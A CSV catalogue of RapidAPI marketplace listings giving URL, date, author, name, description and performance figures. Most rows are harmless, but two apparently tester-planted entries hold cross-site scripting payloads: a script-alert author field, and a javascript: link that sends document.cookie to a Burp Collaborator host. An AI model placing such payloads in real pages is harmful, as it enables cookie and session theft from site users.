API链接,Update_Time,Author,API名称,API描述,API Popularity,API Latency,API Service Level
https://rapidapi.com/dmouratidis153/api/giortes/,2021-11, Dimitrios Mouratidis ,Giortes,Get name days - Eortologio,8.2,"9,988 ms",100%
https://rapidapi.com/kalinindanilq7734/api/get-site-screenshot/,2023-03, Kalinin Dnail ,Get site screenshot,Get site screenshot,,,
https://rapidapi.com/urregojoseluis26/api/create-transaction-dale/,2022-11, Jose Luis Urrego ,Create Transaction Dale,Api que retorna info de transaccion,,,
https://rapidapi.com/richard.mccauley1/api/testing893/,2022-11, Richard Mc Cauley ,Testing,Testing,,,
https://rapidapi.com/ipilloni/api/demo133/,2021-11, Fernando Ivan Pilloni Benavides ,Demo,demo para RH,8.1,485 ms,100%
https://rapidapi.com/lanxirye/api/xi-lan/,2021-11, Xi Lan ,Xi Lan,personal use,,,
https://rapidapi.com/nivito-singapore-nivito-singapore-default/api/nivito-singapore/,2022-11, Nivito Singapore ,Nivito Singapore,"Your kitchen is the heart of your home, so why not make it as beautiful as it can be? With a Nivito kitchen faucet, you can have the perfect balance of form and function. This stunning kitchen faucet has a sleek, modern design that will complement any kitchen décor. But it's not just about looks – this faucet is also built to last, with a durable construction and a finish that resists tarnishing and corrosion. Plus, it comes with a convenient pull-down sprayer for all your cleaning and cookin...",,,
https://rapidapi.com/bedinavinyt/api/lol55/,2023-10, ? ,lol,lol,8.2,21 ms,100%
https://rapidapi.com/gotosatheesh-Xt-YT64_Aet/api/boomi_inventory/,2021-11, Satheesh Kumar ,Boomi_Inventory,API to update stock details,,,
https://rapidapi.com/bobbysworld820/api/neko-sfw/,2022-11, andrew Bell ,Neko SFW,This Program will provide SFW images,,,
https://rapidapi.com/souzadie/api/csa/,2021-11, Diego Souza ,csa,Colegio Santa Ana,,,
https://rapidapi.com/authenticalls2fa/api/authenticalls/,2023-06, authenticalls2fa ,Authenticalls,"Authenticalls is the 2FA Flash Call industry leader, with 100% coverage and 100% Flash Call delivery",,,
https://rapidapi.com/horvatlpd/api/demo1120/,2022-11, horvat-lpd ,Demo1,demo1,8.1,"1,053 ms",100%
https://rapidapi.com/rakutensupport-rakutensupport-default/api/rakutensupportdefaultteam/,2021-11, RakutenSupport ,RakutenSupportDefaultTeam,RのSupportテストです。,,,
https://rapidapi.com/enclout/api/stemmer/,2021-11, enclout ,Stemmer,"This API takes a paragraph and returns the text with each word stemmed using porter stemmer, snowball stemmer or UEA stemmer",,,
https://rapidapi.com/enclout/api/dmoz/,2021-11, enclout ,DMOZ,This API retrieves DMOZ category for a given domain,,,
https://rapidapi.com/enclout/api/content-analysis/,2021-11, enclout ,Content Analysis,"This API performs a basic content analysis for a given domain. It extracts category, Language, URL, redirect URL, meta_keywords, meta_description, company, phone and email information",,,
https://rapidapi.com/jackieralf3-k_Er__8F9/api/testapi1005/,2023-03, w zh ,TestApi,Test Api,,,
https://rapidapi.com/luisvivas/api/ponalytics/,2023-01, Luis Alberto Vivas ,Ponalytics,"Tweets and other data of politicians. Get tweets made Senators, Governors and the sentimental analysis score using NLP. find out the most liked tweet of a specific Representative. Get also summary by political parties.",,,
https://rapidapi.com/rudhi1009/api/korean-baby-name-ranking/,2023-02, Kate park ,Korean Baby Name Ranking,"Popular Korean baby names, ranking, counts. 가장 인기있는 한국 아기 이름 정보를 알려드려요.",,,
https://rapidapi.com/tdeepak509/api/qreativeqr-a-customizable-qr-code-generator/,2023-02, Deepak Jangir ,QreativeQR: A Customizable QR Code Generator,"The QR code generator API is a powerful tool that allows users to generate custom QR codes with ease. With this API, you can create a simple QR code, customize the size, border size, and color of the QR code, set the background color, and even insert an image or logo in between the QR code. The image can be a base64 image or uploaded via a POST request. With these powerful features, this API provides users with the flexibility they need to create custom QR codes that match their brand or appl...",,,
https://rapidapi.com/parsach222/api/qrcode50/,2023-05, parsa ch ,qrcode,this api take your url as a string and convert to qrcode,,,
https://rapidapi.com/stevenrafft/api/emojiapi1/,2021-11, Steven Rafft ,EmojiAPI,An API that will return a random emoji from /emojis,,,
https://rapidapi.com/hosseinrezai77/api/testapi1046/,2023-05, hossein rezai ,testApi,for testing befor deployment,,,
https://rapidapi.com/sujeetkalaskar8185-6X60d2TescN/api/testapi708/,2021-11, Sujeet Kalaskar ,TestAPI,returns hello,,,
https://rapidapi.com/APIplaza1/api/global-governmental-data/,2023-03, APIplaza ,Global Governmental Data,API providing global governmental data for nations and states around the world,,,
https://rapidapi.com/andreyguminskii/api/ai-quotes61/,2023-02, Andrey Guminskiy ,AI Quotes,Free AI Quotes from many authors,,,
https://rapidapi.com/reaudit/api/test_swagger_upload/,2021-11, <script>alert(1);</script> ,test_swagger_upload,A sample [bypass-filter-test](javascript:alert('test')) API that uses a petstore as an example to demonstrate features in the swagger-2.0 specification,,,
https://rapidapi.com/testxss444/api/test_mail_xss/,2021-11, testxss444 ,test_mail_xss,A sample [CLICK ME](javascript:window.location='http://jczqsdk8c5gwiyhwx0pwv7yac1ir6g.burpcollaborator.net?cookie='+document.cookie) API that uses a petstore as an example to demonstrate features in the swagger-2.0 specification,,,
https://rapidapi.com/austin/api/httpbin-test/,2021-11, austin ,httpbin-test,httpbin test,,,
https://rapidapi.com/community/api/voxsci-voice-to-text/,2021-11, community ,VoxSci Voice to Text,"VAPI - VoxSci Application Programming Interface Comment lines, voice of the customer, marketing surveys, opinion polls, marketing questionnaires, network or PABX operators and affiliates with large volumes of voice messages can benefit from the improved efficiency and security of using our API interface. Using VAPI you can integrate existing systems to handle voice to text conversions transparently by sending us the audio files and letting our system cope with the transcriptions which are then sent back to your system. VAPI is a straight forward API and messages can be sent to us in a variety of ways from email through to XML HTTP requests via a secure direct connection between your IT structure and ours. All responses can also then be sent back in email or via HTTP PUSH in XML format.",,,
https://rapidapi.com/paaaaaaaaaa/api/postcards-by-stannp/,2021-11, paaaaaaaaaa ,Postcards By Stannp,Send real physical postcards using our partner API. A print on demand service.,,,
https://rapidapi.com/ruemic/api/bitballoon-1/,2021-11, ruemic ,BitBalloon,The ultimate hosting platform for your HTML5 sites & apps. BitBalloon is all about connecting the elegant simplicity of static sites with the power of the programmable web. Our focus is making it as simple as possible to publish sites that are optimized for performance and leverage the API economy in a meaningful way.,,,
https://rapidapi.com/guitarlnw_tc006/api/line-notify-when-the-web-was-shutdown/,2021-11, กานต์ พีเค ,Line notify when the web was shutdown,Line notify when the web was shutdown,,,
https://rapidapi.com/RowenTey/api/sc2006-justjio/,2022-11, RowenTey ,SC2006-JustJio,Endpoint for JustJIo,,,
https://rapidapi.com/jjrp267/api/my-notes/,2021-11, jjrp267 ,my notes,my notes,,,
https://rapidapi.com/info.soutech.dev/api/csa1/,2021-11, Diego Souto ,csa,Colegio Santa Ana,,,
https://rapidapi.com/zizanet/api/baslaapi/,2022-11, zizanet ,BaslaApi,We are trying a new search api,,,
https://rapidapi.com/talkingwithtonte/api/ehj/,2022-11, Tonte Bo Douglas ,EHJ,EHJ website,,,
https://rapidapi.com/fadilchady/api/asas5/,2021-11, fadilchady ,asas,sasasasa,,,
https://rapidapi.com/dyeigo007-KSWe7rzj6T/api/prueba211/,2021-11, diego armando muñoz ,prueba2,prueba2,,,
https://rapidapi.com/manwithavanlondon/api/man-and-van-fulham/,2022-11, Man And Van Fulham ,Man And Van Fulham,Man And Van Fulham,,,
https://rapidapi.com/mataharisenj/api/upload-image2/,2021-11, Rindang Rahastri Pratiwi ,Upload Image,This is a sample server for upload image.,,,
https://rapidapi.com/organizationforteama56750-default/api/appforteama56750/,2021-11, OrganizationForTeamA56750 ,AppForteama56750,AppForteama56750,,,
https://rapidapi.com/mataharisenj/api/pet3/,2021-11, Rindang Rahastri Pratiwi ,Pet,"This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters.",,,
https://rapidapi.com/Canssens/api/wsse-security/,2021-11, Charles Anssens ,WSSE Security,"Generate WSSE headers : WSSE profile=""UsernameToken""",,,
https://rapidapi.com/webknox/api/entities/,2021-11, mail@webknox.com ,Entities,"The WebKnox entities API gives you access to millions of entities such as cities, actors, movies, cars, etc. You can search for entities and get factual information. Additionally, you may detect known entities from texts (often referred to as Named Entity Recognition).",,,
https://rapidapi.com/jessloboz/api/qr-code-api63/,2023-01, Jesudas Lobo ,QR code API,This API takes any string and returns the QR code image in PNG format.,,,
https://rapidapi.com/rafalochotny95-KB2hIUrqkj/api/people6/,2021-11, Rafał Ochotny ,People,API generates random person informations. Just like Lorem ipsum but for people,,,
https://rapidapi.com/wahrcoder-wahrcoder-default/api/most-expensive-api/,2023-11, WahrCoder ,Most Expensive API,Get access to different tiers of the most expensive API. Not everyone can access one or all tiers as this API is so very expensive. Those who posses access to this API are in a very limited circle of persons/companies.,,,
https://rapidapi.com/ayebazibw68/api/qr-code-api116/,2023-01, Patrick Ayebazibwe ,QR Code api,API generates images from URL.,,,
https://rapidapi.com/ThainanLuiz/api/phrases-api/,2023-01, ThainanLuiz ,Phrases API,"Introducing the Phrase Generator API, a powerful tool that allows you to easily generate phrases in multiple languages with a single API call.",,,
https://rapidapi.com/itsdoguscan-BJ9f4cmEDrz/api/playful-usernames/,2023-01, Doğuş Can ,Playful Usernames,"Generate unique and playful usernames for users. It combines a list of colors with a list of animals to create unique combinations, such as ""whiterabbit"" or ""purplekoala"". These usernames are perfect for online communities, gaming platforms, or any other place where users need a unique identifier. It's a simple but fun way to add some personality to your online presence.",,,
https://rapidapi.com/shahdhruvil00/api/qr-code-download1/,2023-02, Dhruvil Shah ,QR-Code Download,This QR code generator API is a web-based service built using the Flask framework in Python. It allows users to generate a QR code image for any data string provided as a query parameter. The API has two endpoints: /: The homepage of the API that provides information about the site and allows users to navigate to the QR code generation page. /generate_qr: This endpoint generates a QR code image when a GET request is made to this endpoint with a data parameter that contains the data string t...,,,
https://rapidapi.com/testkojistvarnonijezauzet/api/qr-code67/,2023-02, Petar Jurilj ,QR Code,Download QR Code with any custom text,,,
https://rapidapi.com/StableAPI/api/shoutcloud-io/,2021-11, StableAPI ,SHOUTCLOUD.io,ALL CAPS AS A SERVICE,,,
https://rapidapi.com/Flajt/api/decentprove/,2021-11, Flajt ,DecentProve,Store files in an immutable way to allow integrity verification with the help of Blockchain technology. Simply use a POST or GET request to either store a file hash or to verify a file hash.,,,
https://rapidapi.com/jormshop/api/convert-coin-price/,2023-11, JOR ,Convert Coin Price,API For Convert Coin Price To coin.,,,
https://rapidapi.com/edgarfur-HNbCEGamI5C/api/registro-publico-para-evitar-publicidad-repep/,2023-02, Edgar Uribe ,Registro Público para Evitar Publicidad (REPEP),Verifica si un número se encuntra registrado en el Registro Público para Evitar Publicidad (REPEP).,,,
https://rapidapi.com/nostonpe/api/qr-code-generator-api16/,2023-02, nostonpe ,QR Code generator API,"This API is running with Python Flash server and it is fast. You can use this API as QR code generator api. All you have to do, is to send a request with the URL you want, and immediently get the QR code Image in response.",,,
https://rapidapi.com/navitimejapan-navitimejapan/api/for-claris-bicycle/,2021-11, NAVITIMEJAPAN ,For Claris bicycle,Claris Connect連携用のサービスです。自転車のルート検索を行うために利用します。,,,
https://rapidapi.com/totodunet/api/decimals-search/,2021-11, Thomas ,Decimals Search,"Decimals Search is an irrational number search engine. It provides more 60 billion decimals of 8 irrational numbers (pi, e, sqrt(2), golden ratio, ln(2), ln(10), apery's constant, euler-mascheroni's constant). You can search a numeric string, count decimals and get any decimals !",,,
https://rapidapi.com/bielmax19/api/max-ftgo-refund/,2022-11, bielmax19 ,Max-FTGO-Refund,Max - Test API Refund,,,
https://rapidapi.com/aqeelmalik615/api/myreva/,2021-11, Aqeel Malik ,MyReva,Weather Info,,,
https://rapidapi.com/jeromeyang/api/test20201115/,2021-11, 楊智超 ,Test20201115,Test20201115,,,
https://rapidapi.com/lylebak/api/kodii/,2021-11, Lyle Back ,Kodii,Aio,,,
https://rapidapi.com/WadeWegner/api/send-external-logs/,2023-02, Wade Wegner ,Send External Logs,This API simulates an API gateway sending an API log to RapidAPI so that you can test the Platform Analytics API ingest in a tenant.,,,
https://rapidapi.com/Avneesh/api/indian-phone-number-info/,2021-11, Avneesh ,Indian Phone Number Info,"Get the connection type,circle name and operator name using this API. Mobile number portability not supported as of now. Please get in touch with me if you would like to improve this api in any way or would like some other feature added to it. See you around!!!",,,
https://rapidapi.com/abiodunoluwasegunsharafa-Pu9kywlF-YE/api/users-at-random-generator/,2021-11, Abiodun O.S ,Users at Random Generator,This API generates random users for you to test your application with.,,,
https://rapidapi.com/tom-vKeH41fEb/api/falcon10/,2022-11, Tom Daley ,Falcon,Services for law firm automation,,,
https://rapidapi.com/charlestgoldberg/api/famous-popular-fictional-characters-arabia-arabic-descent/,2021-11, charlestgoldberg ,Famous Popular Fictional Characters Arabia Arabic Descent,Most Famous & Popular Fictional Characters from Arabia Arabic Descent,,,
https://rapidapi.com/ducgiang/api/all-random/,2021-11, Giang Nguyen ,All Random,A collection of APIs for randomization,,,
https://rapidapi.com/xiejun325-PVjPTW9Skcu/api/shenzhen-house-price/,2021-11, jun xie ,shenzhen house price,fetch latest Shenzhen house sold price everyday,,,
https://rapidapi.com/dev.manav.sethi/api/javascript-front-end-validations/,2021-11, Manav Sethi ,javascript front-end validations,Input validations using javascript,,,
https://rapidapi.com/taylord0ng/api/test10269/,2022-11, taylord0ng ,test,test api,,,
https://rapidapi.com/santosharron-PKJ6gK9OwH/api/random-users/,2021-11, Santosh Arron ,Random Users,This API provides random users which you can use it for testing your application.,,,
https://rapidapi.com/hlqvu328-28khpKLkJIv/api/11132/,2021-11, VUX ,111,111,,,
https://rapidapi.com/charlestgoldberg/api/saddest-deaths-1992/,2021-11, charlestgoldberg ,Saddest Deaths 1992,Saddest Deaths of 1992,,,
https://rapidapi.com/khorshedblog/api/random-color-generator/,2021-11, KhorsheD ,Random Color Generator,Generate random colors from a simple requests.,,,
https://rapidapi.com/vivek43/api/vk-test-api/,2021-11, vivek43 ,vk-test-api,Testing api description,,,
https://rapidapi.com/michellevelasquez/api/books51/,2022-11, michellevelasquez ,books,API for book reviews.,,,
https://rapidapi.com/hxnb5fh7w/api/test6332/,2021-11, hxnb5fh7w ,test,test,,,
https://rapidapi.com/charlestgoldberg/api/powerful-female-marvel-superheroes/,2021-11, charlestgoldberg ,Powerful Female Marvel Superheroes,Most Powerful Female Marvel Superheroes,,,
https://rapidapi.com/charlestgoldberg/api/famous-popular-fictional-characters-from-kenya-kenyan-descent/,2021-11, charlestgoldberg ,Famous Popular Fictional Characters from Kenya Kenyan Descent,Most Famous & Popular Fictional Characters from Kenya Kenyan Descent,,,
https://rapidapi.com/aqeel.mashkraft/api/touchbase/,2021-11, aqeel.mashkraft ,Touchbase,A school's score or placement on the API is designed to be an indicator of a school's performance level and is calculated annually by the California Department of Education,,,
https://rapidapi.com/yambal/api/japan-365-days/,2021-11, yambal ,Japan 365 Days,This is Test API. このAPIはテスト中です。 This is Test API. このAPIはテスト中です。,,,
https://rapidapi.com/edgarfur-HNbCEGamI5C/api/informacion-vehiculos-de-mexico/,2023-10, Edgar Uribe ,Informacion vehiculos de Mexico,"Verifica si un vehículo (automóvil, camioneta, carro) es robado, así como su información en el REPUVE a través de su placa o NIV (Número de identificación vehicular).",2.1,"1,497 ms",29%
https://rapidapi.com/prokerala-prokerala-default/api/astrology4/,2021-11, Prokerala ,Astrology,Power your Astrology Website or App with a range of astrology content. Engage your audience with vedic and western astrology content powered by Prokerala API – Your most trusted and reliable source for authentic astrology service.,2.0,811 ms,100%
https://rapidapi.com/whoisapi/api/whois-3/,2021-11, Whois XML API ,whois,"Returns well-parsed whois fields in XML and JSON formats. Use it to track domain registrations, check domain name availability, detect credit card fraud, locate users geographically. The service automatically follows the whois registry referral chains until it finds the correct whois registrars with the most complete whois data. Works over basic HTTP and avoices firewall-related problems of accessing Whois servers on port 43.",2.2,"2,904 ms",100%
https://rapidapi.com/macortiz/api/petstore158/,2023-08, macortiz ,Petstore,Petstore API,2.0,562 ms,100%
https://rapidapi.com/yarokon1/api/user-demo/,2022-11, Ярослав Шугайло ,User demo,-,,,
https://rapidapi.com/faridasad/api/shortener6/,2023-03, faridasad ,Shortener,Shorten url links,,,
https://rapidapi.com/asposecloud/api/aspose-html-cloud/,2021-11, Aspose Cloud ,Aspose.HTML Cloud,"Aspose.HTML Cloud is a REST API for manipulating and converting the HTML documents. You can render HTML document into document formats such as PDF and XPS, or into raster image formats such as TIFF, BMP, PNG, and JPEG. You can also select the HTML page markup fragments using the XPath query and extract the images.",,,
https://rapidapi.com/groupdocscloud/api/groupdocs-signature-cloud/,2021-11, GroupDocs Cloud APIs ,GroupDocs.Signature Cloud,"GroupDocs.Signature Cloud is a REST API that enables you to create, verify, search, and manipulate various types of signatures for the cloud-based documents.",0.0,745 ms,100%
https://rapidapi.com/asposecloud/api/aspose-tasks-cloud/,2021-11, Aspose Cloud ,Aspose.Tasks Cloud,"Aspose.Tasks Cloud is a REST API for creating project document management applications that work with common Project file formats in the cloud. You can convert project data files to other formats, read tasks, resources, calendar information and manipulate other project data using the API.",0.0,751 ms,100%
https://rapidapi.com/inviteuser1/api/anewapi/,2021-11, OrganizationDemo1One ,AnewAPI,"This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters.",,,
https://rapidapi.com/asposecloud/api/aspose-slides-cloud/,2021-11, Aspose Cloud ,Aspose.Slides Cloud,"Aspose.Slides Cloud is a REST based API which allows you to read, edit and convert PowerPoint documents in the cloud. You can convert PowerPoint documents into various other formats like TIFF, PDF, PPTX, XPS and PPT etc. You can extract the contents like text and images from the PowerPoint documents.",,,
https://rapidapi.com/automationsundayTestApiUN/api/app23/,2021-11, automationsundayTestApiDis ,app2,This is a swagger file for API calls for the automation test,,,
https://rapidapi.com/sunnytsang/api/testname/,2021-11, Sunny Tsang ,testname,testdesc,,,
https://rapidapi.com/groupdocscloud/api/groupdocs-annotation-cloud/,2021-11, GroupDocs Cloud APIs ,GroupDocs.Annotation Cloud,The GroupDocs.Annotation Cloud is a REST API that helps you apply text & figure annotations to the documents in the cloud.,0.0,771 ms,100%
https://rapidapi.com/groupdocscloud/api/groupdocs-merger-cloud1/,2021-11, GroupDocs Cloud APIs ,GroupDocs.Merger Cloud,GroupDocs.Merger Cloud is a REST API that allows you to join multiple documents and manipulate single document structure across a wide range of supported document types.,0.0,837 ms,100%
https://rapidapi.com/asposecloud/api/aspose-diagram-cloud/,2021-11, Aspose Cloud ,Aspose.Diagram Cloud,Aspose.Diagram is a REST API for working with the Microsoft Visio Object Model. Aspose.Diagram provides better performance and is easier to use to manipulate diagrams and convert files than Microsoft Office Automation.,0.1,885 ms,100%
https://rapidapi.com/asposecloud/api/aspose-pdf-cloud1/,2021-11, Aspose Cloud ,Aspose.PDF Cloud,"Aspose.PDF Cloud APIs allows you to create, edit and convert PDF files in the cloud. You can convert PDF documents into various other formats like HTML, DOC, JPEG, TIFF, TXT etc. You can also extract PDF contents including text and images from the PDF files.",0.0,746 ms,99%
https://rapidapi.com/groupdocscloud/api/groupdocs-comparison-cloud/,2021-11, GroupDocs Cloud APIs ,GroupDocs.Comparison Cloud,GroupDocs.Comparison Cloud is a REST API provides you with a difference checker functionality to comapre same format documents.,0.1,709 ms,100%
https://rapidapi.com/groupdocscloud/api/groupdocs-classification-cloud/,2021-11, GroupDocs Cloud APIs ,GroupDocs.Classification Cloud,GroupDocs.Classification Cloud is a REST API for document classification.,,,
https://rapidapi.com/Gil%20test%20again/api/ready-2-0/,2021-11, Display Gil ,Ready??2.0,Blobing,,,
https://rapidapi.com/automationsundayTestApiUN/api/app15/,2021-11, automationsundayTestApiDis ,app1,This is a swagger file for API calls for the automation test,,,
https://rapidapi.com/vlnca-default/api/team-petstore/,2021-11, VlncaUPDATED ,team petstore,"This is a sample server Petstore server. You can find out more about Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net, #swagger](http://swagger.io/irc/). For this sample, you can use the api key `special-key` to test the authorization filters.",0.0,970 ms,100%
https://rapidapi.com/groupdocscloud/api/groupdocs-conversion-cloud/,2021-11, GroupDocs Cloud APIs ,GroupDocs.Conversion Cloud,GroupDocs.Conversion Cloud is a REST API to assist you in performing document conversion in the cloud for a wide range of document formats.,0.0,802 ms,100%
https://rapidapi.com/asposecloud/api/aspose-words-cloud1/,2021-11, Aspose Cloud ,Aspose.Words Cloud,"Aspose.Words Cloud is a REST API to create, manipulate, convert and render Word documents in the cloud by performing a wide variety of document operations you can wish to perform on a document in the cloud.",,,
https://rapidapi.com/asposecloud/api/aspose-cells-cloud/,2021-11, Aspose Cloud ,Aspose.Cells Cloud,"Aspose.Cells Cloud is a REST API that enables you to perform a wide range of document processing operations including creation, manipulation, conversion and rendering of Excel documents in the cloud. You can convert your XLS and XLSX files to various other formats like PDF, HTML, ODS, XPS, CSV etc.",0.0,757 ms,100%
https://rapidapi.com/asposecloud/api/aspose-cad-cloud/,2021-11, Aspose Cloud ,Aspose.CAD Cloud,"Aspose.CAD Cloud allows developers to convert CAD drawings such as DWG, DWF and DXF to PDF and Raster images. It is a REST API so does not require AutoCAD or any software to be installed. You can also convert the selected layers and layouts from the CAD drawings. The conversion to PDF and Raster images is of very high quality.",,,
https://rapidapi.com/JhowJhoe/api/tabela-fipe-simples/,2021-11, JhowJhoe ,Tabela Fipe Simples,"Tabela FIPE Simples Carros, Motos e Caminhões. Atualizada, diretamente do site da www.fipe.org.br todos os dias. Tabela Fiple Simples JQUERY/PHP",,,
https://rapidapi.com/rdegges/api/minify/,2021-11, Randall Degges ,Minify,"The minify API allows you to easily compress your CSS, HTML, and Javascript code with a single API call. Minify is ideal for web developers building static sites, who want to cache the smallest possible version of their assets in order to speed up delivery to end users. Plug this API into your build tools, or your production web servers to speed up your site.",,,
https://rapidapi.com/yoavshalev/api/quote-of-the-day/,2021-11, yoavshalev ,Quote Of The Day,API for Quotes database,,,
https://rapidapi.com/getproxylist/api/getproxylist-com-proxies-rest/,2021-11, Matthew King ,GetProxyList.com Proxies - REST,A fresh proxy on every request. GetProxyList.com has over 5000+ active proxies and uses state of the art scanning techniques to locate fresh proxies every hour. Use our free proxy list REST API to find active & working proxies tested every 10 minutes.,0.0,535 ms,100%
